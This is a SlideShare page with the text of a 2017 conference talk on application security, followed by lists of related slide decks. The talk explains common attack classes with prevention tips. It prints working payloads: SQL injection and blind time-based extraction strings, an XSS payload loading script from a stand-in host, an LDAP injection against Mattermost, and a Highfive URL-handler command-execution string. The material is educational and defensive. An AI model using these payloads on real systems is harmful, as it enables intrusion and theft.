SlideShare uma empresa Scribd logo

AOEconf17: Application Security

AOE
AOE

AOEconf17 talk "Application Security" by Bastian Ike.

Software
1 de 42
Baixar para ler offline
Application Security AOE Conf 2017
What is
 Application Security?
Application Security • Security in software • Not management security, perimeter security, etc • Possible Attack vectors • How to prevent issues
Attack vectors
Code Execution Make a system execute arbitrary code
Buffer Overflows • Assembler code injected into memory • 1996, Aleph One, "Smashing the stack for fun and profit" • Possible by overflowing a programs memory with controlled data
SQL Injection • Execute arbitrary SQL code • Possible by interpolating user-submitted data without proper escaping • Can be used to read/write files on DB server
Cross Site Scripting • Execute arbitrary JavaScript in a privileged context • Executed on a client's machine • Privileged context: Browser (domain/cookies) • Steal/Modify cookies • AJAX Requests to privileged areas
Cryptography Attack cryptographic measures for confidentiality and integrity
Signatures • Fake signatures/tokens for unauthorised access
Encryption • Break encryption • Missing encryption • Broken Encryption: • Example: Bleichenbacher RSA
Business Logic Make legit code behave in an unintended way
Race Conditions • Re-order execution flows to change an operations result
Exploit basics
SQL Injection • Query: SELECT * FROM users WHERE 
 username="${USERNAME}" AND 
 password="${PASSWORD}"; • Username: Bastian • Passwort: Sesame098 • Query: SELECT * FROM users WHERE 
 username="Bastian" AND 
 password="Sesame098";
SQL Injection • Query: SELECT * FROM users WHERE 
 username="${USERNAME}" AND 
 password="${PASSWORD}"; • Username: Bastian • Passwort: " OR 1=1 -- x • Query: SELECT * FROM users WHERE 
 username="Bastian" AND 
 password="" OR 1=1 -- x";
SQL Injection • Query: SELECT * FROM logs WHERE 
 token="${TOKEN}"; • Token: a" AND IF(SUBSTRING(
 (SELECT password FROM users WHERE name="admin" LIMIT 1)
 ,0,1) = 'a', SLEEP(5), 0) -- x • Query: SELECT * FROM logs WHERE
 token="a" AND IF(SUBSTRING(
 (SELECT password FROM users WHERE name="admin" LIMIT 1)
 ,0,1) = 'a', SLEEP(5), 0) -- x";
Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page=hello • Template: <a href="hello">You are here</a>
Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page="><script src="http://backdoor.com/x.js"></script> • Template: <a href=""><script src="http:// backdoor.com/x.js"></script>">You are here</a>
Cross-Site Scripting • Code runs in Browser of the one opening the link • Access to Cookies+LocalStorage • Can send requests and read their result (emulate administrator behaviour) • Change page look/behaviour (steal passwords, etc)
Exploits samples
Mattermost LDAP Injection • https://mattermost/api/v3/users/login • login_id: username)(givenName=test* • password: "" • Response: • 401: OK, query successful • 50x: Error, query failed
Mattermost LDAP Injection
Mattermost LDAP Injection
Mattermost LDAP Injection
Mattermost LDAP Injection • Prevention: properly escape characters which might be interpreted by LDAP
Highfive RCE • Target: URL-Handler highfive:// • Possible arguments: ?domain=, ?protocol=
Highfive RCE Privileged Non-Privileged Display Web-pages Execute processes etc Highfive Sandbox (NW.js) Whitelist: https://highfive.com https://dev.highfive.com
Highfive RCE • highfive://test.com.a/? domain=alert(require('child_process').execSyn c('hostname;echo;id').toString())// &protocol=javascript • Starts Highfive on a privileged initial domain • Redirects to: protocol + '://' + domain + path • Becomes: 
 javascript:// alert(require('child_process').execSync('host name;echo;id').toString())//something
Highfive RCE • Redirect to javascript:// does not change the sandbox • Works on any operating system • Thank you JavaScript 😙
Highfive RCE • Prevention: whitelist redirect targets
JWT Null Tokens
JWT Null Tokens
JWT Null Tokens
JWT Null Tokens
JWT Null Tokens • Prevention: Do not allow null signature algorithms
Preventive actions
Finding Security issues • Code Reviews • Curiosity • (sometimes: automated scanners)
Stay up to date
React fast
React fast • Escalation plan for security incidents • Fast deployment strategies • Firewall setup to cut off possible infected systems • Snapshot infrastructure for later analysis
Thank you :) Questions?

Recomendados

Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
Stormpath
 
AtlasCamp 2014: Writing Connect Add-ons for Confluence
AtlasCamp 2014: Writing Connect Add-ons for ConfluenceAtlasCamp 2014: Writing Connect Add-ons for Confluence
AtlasCamp 2014: Writing Connect Add-ons for Confluence
Atlassian
 
Using Controls, calling Launchers. IsolatedStorages and Local DataBase samples
Using Controls, calling Launchers. IsolatedStorages and Local DataBase samplesUsing Controls, calling Launchers. IsolatedStorages and Local DataBase samples
Using Controls, calling Launchers. IsolatedStorages and Local DataBase samples
Rashad Aliyev
 
AtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
AtlasCamp 2014: 10 Things a Front End Developer Should Know About ConnectAtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
AtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
Atlassian
 
AtlasCamp 2014: Connect Security
AtlasCamp 2014: Connect SecurityAtlasCamp 2014: Connect Security
AtlasCamp 2014: Connect Security
Atlassian
 
Securing Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token Authentication
Stormpath
 
«How to start in web application penetration testing» by Maxim Dzhalamaga
«How to start in web application penetration testing» by Maxim Dzhalamaga «How to start in web application penetration testing» by Maxim Dzhalamaga
«How to start in web application penetration testing» by Maxim Dzhalamaga
0xdec0de
 
An approach to app security - For beginners
An approach to app security - For beginnersAn approach to app security - For beginners
An approach to app security - For beginners
vodQA
 

Recomendados

Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
Stormpath
 
AtlasCamp 2014: Writing Connect Add-ons for Confluence
AtlasCamp 2014: Writing Connect Add-ons for ConfluenceAtlasCamp 2014: Writing Connect Add-ons for Confluence
AtlasCamp 2014: Writing Connect Add-ons for Confluence
Atlassian
 
Using Controls, calling Launchers. IsolatedStorages and Local DataBase samples
Using Controls, calling Launchers. IsolatedStorages and Local DataBase samplesUsing Controls, calling Launchers. IsolatedStorages and Local DataBase samples
Using Controls, calling Launchers. IsolatedStorages and Local DataBase samples
Rashad Aliyev
 
AtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
AtlasCamp 2014: 10 Things a Front End Developer Should Know About ConnectAtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
AtlasCamp 2014: 10 Things a Front End Developer Should Know About Connect
Atlassian
 
AtlasCamp 2014: Connect Security
AtlasCamp 2014: Connect SecurityAtlasCamp 2014: Connect Security
AtlasCamp 2014: Connect Security
Atlassian
 
Securing Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token Authentication
Stormpath
 
«How to start in web application penetration testing» by Maxim Dzhalamaga
«How to start in web application penetration testing» by Maxim Dzhalamaga «How to start in web application penetration testing» by Maxim Dzhalamaga
«How to start in web application penetration testing» by Maxim Dzhalamaga
0xdec0de
 
An approach to app security - For beginners
An approach to app security - For beginnersAn approach to app security - For beginners
An approach to app security - For beginners
vodQA
 
Build A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON APIBuild A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON API
Stormpath
 
Introdcution to Adobe CQ
Introdcution to Adobe CQIntrodcution to Adobe CQ
Introdcution to Adobe CQ
Rest West
 
Web Hacking series part 2
Web Hacking series part 2Web Hacking series part 2
Web Hacking series part 2
Aditya Kamat
 
Digər proqramlaşdırma dillərində Android platforması üçün proqramlaşdırma
Digər proqramlaşdırma dillərində Android platforması üçün proqramlaşdırmaDigər proqramlaşdırma dillərində Android platforması üçün proqramlaşdırma
Digər proqramlaşdırma dillərində Android platforması üçün proqramlaşdırma
Rashad Aliyev
 
Securty Testing For RESTful Applications
Securty Testing For RESTful ApplicationsSecurty Testing For RESTful Applications
Securty Testing For RESTful Applications
Source Conference
 
ASP.NET - Ivan Marković
ASP.NET - Ivan MarkovićASP.NET - Ivan Marković
ASP.NET - Ivan Marković
Software StartUp Academy Osijek
 
Using an in-house WordPress framework
Using an in-house WordPress frameworkUsing an in-house WordPress framework
Using an in-house WordPress framework
peterwilsoncc
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
Sam Bowne
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)
Stormpath
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrong
Derek Perkins
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET Website
DNN
 
Adobe CQ5 for Developers - Introduction
Adobe CQ5 for Developers - IntroductionAdobe CQ5 for Developers - Introduction
Adobe CQ5 for Developers - Introduction
Tekno Point
 
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site ScriptingOWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
Denim Group
 
Learn css step by step online course
Learn css step by step online course Learn css step by step online course
Learn css step by step online course
Naeem Hussain
 
Exploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shellExploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shell
Aditya Kamat
 
CNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side ControlsCNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side Controls
Sam Bowne
 
All ivanti is a secure workspace - Bsides Delft 2018
All ivanti is a secure workspace - Bsides Delft 2018All ivanti is a secure workspace - Bsides Delft 2018
All ivanti is a secure workspace - Bsides Delft 2018
Johanna Curiel
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
Sam Bowne
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
Sam Bowne
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security Ninja
Paul Gilzow
 

Mais conteúdo relacionado

Mais procurados

Build A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON APIBuild A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON API
Stormpath
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrong
Derek Perkins
 

Mais procurados (19)

Build A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON APIBuild A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON API
 
Introdcution to Adobe CQ
Introdcution to Adobe CQIntrodcution to Adobe CQ
Introdcution to Adobe CQ
 
Web Hacking series part 2
Web Hacking series part 2Web Hacking series part 2
Web Hacking series part 2
 
Digər proqramlaşdırma dillərində Android platforması üçün proqramlaşdırma
Digər proqramlaşdırma dillərində Android platforması üçün proqramlaşdırmaDigər proqramlaşdırma dillərində Android platforması üçün proqramlaşdırma
Digər proqramlaşdırma dillərində Android platforması üçün proqramlaşdırma
 
Securty Testing For RESTful Applications
Securty Testing For RESTful ApplicationsSecurty Testing For RESTful Applications
Securty Testing For RESTful Applications
 
ASP.NET - Ivan Marković
ASP.NET - Ivan MarkovićASP.NET - Ivan Marković
ASP.NET - Ivan Marković
 
Using an in-house WordPress framework
Using an in-house WordPress frameworkUsing an in-house WordPress framework
Using an in-house WordPress framework
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrong
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET Website
 
Adobe CQ5 for Developers - Introduction
Adobe CQ5 for Developers - IntroductionAdobe CQ5 for Developers - Introduction
Adobe CQ5 for Developers - Introduction
 
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site ScriptingOWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
 
Learn css step by step online course
Learn css step by step online course Learn css step by step online course
Learn css step by step online course
 
Exploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shellExploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shell
 
CNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side ControlsCNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side Controls
 
All ivanti is a secure workspace - Bsides Delft 2018
All ivanti is a secure workspace - Bsides Delft 2018All ivanti is a secure workspace - Bsides Delft 2018
All ivanti is a secure workspace - Bsides Delft 2018
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
 

Semelhante a AOEconf17: Application Security

Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
Jim Manico
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
Geoffrey Vandiest
 
Web development tips and tricks
Web development tips and tricksWeb development tips and tricks
Web development tips and tricks
maxo_64
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
Philippe Gamache
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
Philippe Gamache
 

Semelhante a AOEconf17: Application Security (20)

Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security Ninja
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
 
Web Security
Web SecurityWeb Security
Web Security
 
Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default"
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Web development tips and tricks
Web development tips and tricksWeb development tips and tricks
Web development tips and tricks
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
 

Mais de AOE

Mais de AOE (20)

Re-inventing airport non-aeronautical revenue generation post COVID-19
Re-inventing airport non-aeronautical revenue generation post COVID-19Re-inventing airport non-aeronautical revenue generation post COVID-19
Re-inventing airport non-aeronautical revenue generation post COVID-19
 
Flamingo - Inspiring Commerce Frontend made in Go - Meet Magento 2019
Flamingo - Inspiring Commerce Frontend made in Go - Meet Magento 2019Flamingo - Inspiring Commerce Frontend made in Go - Meet Magento 2019
Flamingo - Inspiring Commerce Frontend made in Go - Meet Magento 2019
 
Flamingo presentation at code.talks commerce by Daniel Pötzinger
Flamingo presentation at code.talks commerce by Daniel PötzingerFlamingo presentation at code.talks commerce by Daniel Pötzinger
Flamingo presentation at code.talks commerce by Daniel Pötzinger
 
A bag full of trust - Christof Braun at AOE Conference 2018
A bag full of trust - Christof Braun at AOE Conference 2018A bag full of trust - Christof Braun at AOE Conference 2018
A bag full of trust - Christof Braun at AOE Conference 2018
 
Digitalizing the Global Travel Retail World - Kian Gould at Global Retailing ...
Digitalizing the Global Travel Retail World - Kian Gould at Global Retailing ...Digitalizing the Global Travel Retail World - Kian Gould at Global Retailing ...
Digitalizing the Global Travel Retail World - Kian Gould at Global Retailing ...
 
Frankfurt Airport Digitalization Case Study
Frankfurt Airport Digitalization Case StudyFrankfurt Airport Digitalization Case Study
Frankfurt Airport Digitalization Case Study
 
This is what has to change for Travel Retail to survive - Manuel Heidler, AOE
This is what has to change for Travel Retail to survive - Manuel Heidler, AOEThis is what has to change for Travel Retail to survive - Manuel Heidler, AOE
This is what has to change for Travel Retail to survive - Manuel Heidler, AOE
 
AOEconf17: AOE Tech Radar Insights
AOEconf17: AOE Tech Radar InsightsAOEconf17: AOE Tech Radar Insights
AOEconf17: AOE Tech Radar Insights
 
AOEconf17: A flight through our OM³ Systems
AOEconf17: A flight through our OM³ SystemsAOEconf17: A flight through our OM³ Systems
AOEconf17: A flight through our OM³ Systems
 
AOEconf17: AOE Tech Radar Insights
AOEconf17: AOE Tech Radar InsightsAOEconf17: AOE Tech Radar Insights
AOEconf17: AOE Tech Radar Insights
 
AOEconf17: Pets vs. Cattle - modern Application Infrastructure - by Fabrizio ...
AOEconf17: Pets vs. Cattle - modern Application Infrastructure - by Fabrizio ...AOEconf17: Pets vs. Cattle - modern Application Infrastructure - by Fabrizio ...
AOEconf17: Pets vs. Cattle - modern Application Infrastructure - by Fabrizio ...
 
AOEconf17: Agile scaling concepts
AOEconf17: Agile scaling conceptsAOEconf17: Agile scaling concepts
AOEconf17: Agile scaling concepts
 
AOEcon17: Searchperience - The journey from PHP and Solr to Scala and Elastic...
AOEcon17: Searchperience - The journey from PHP and Solr to Scala and Elastic...AOEcon17: Searchperience - The journey from PHP and Solr to Scala and Elastic...
AOEcon17: Searchperience - The journey from PHP and Solr to Scala and Elastic...
 
AOEconf17: UI challenges in a microservice world
AOEconf17: UI challenges in a microservice worldAOEconf17: UI challenges in a microservice world
AOEconf17: UI challenges in a microservice world
 
AOEconf17: Application Security - Bastian Ike
AOEconf17: Application Security - Bastian IkeAOEconf17: Application Security - Bastian Ike
AOEconf17: Application Security - Bastian Ike
 
AOEconf17: Management 3.0 - the secret to happy, performing and motivated sel...
AOEconf17: Management 3.0 - the secret to happy, performing and motivated sel...AOEconf17: Management 3.0 - the secret to happy, performing and motivated sel...
AOEconf17: Management 3.0 - the secret to happy, performing and motivated sel...
 
AOEconf17: How to eat an elePHPant, congstar style - Timo Fuchs & Stefan Rotsch
AOEconf17: How to eat an elePHPant, congstar style - Timo Fuchs & Stefan RotschAOEconf17: How to eat an elePHPant, congstar style - Timo Fuchs & Stefan Rotsch
AOEconf17: How to eat an elePHPant, congstar style - Timo Fuchs & Stefan Rotsch
 
Joern Bock: The basic concept of an agile organisation
Joern Bock: The basic concept of an agile organisationJoern Bock: The basic concept of an agile organisation
Joern Bock: The basic concept of an agile organisation
 
Magento 2 Best Practice Workfow // David Lambauer // Meet Magento 2017 // Lei...
Magento 2 Best Practice Workfow // David Lambauer // Meet Magento 2017 // Lei...Magento 2 Best Practice Workfow // David Lambauer // Meet Magento 2017 // Lei...
Magento 2 Best Practice Workfow // David Lambauer // Meet Magento 2017 // Lei...
 
SUPER-scaling E-Commerce with Magento
SUPER-scaling E-Commerce with MagentoSUPER-scaling E-Commerce with Magento
SUPER-scaling E-Commerce with Magento
 

Último

Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
Health
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
OnePlan Solutions
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...
software pro Development
 

Último (20)

Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
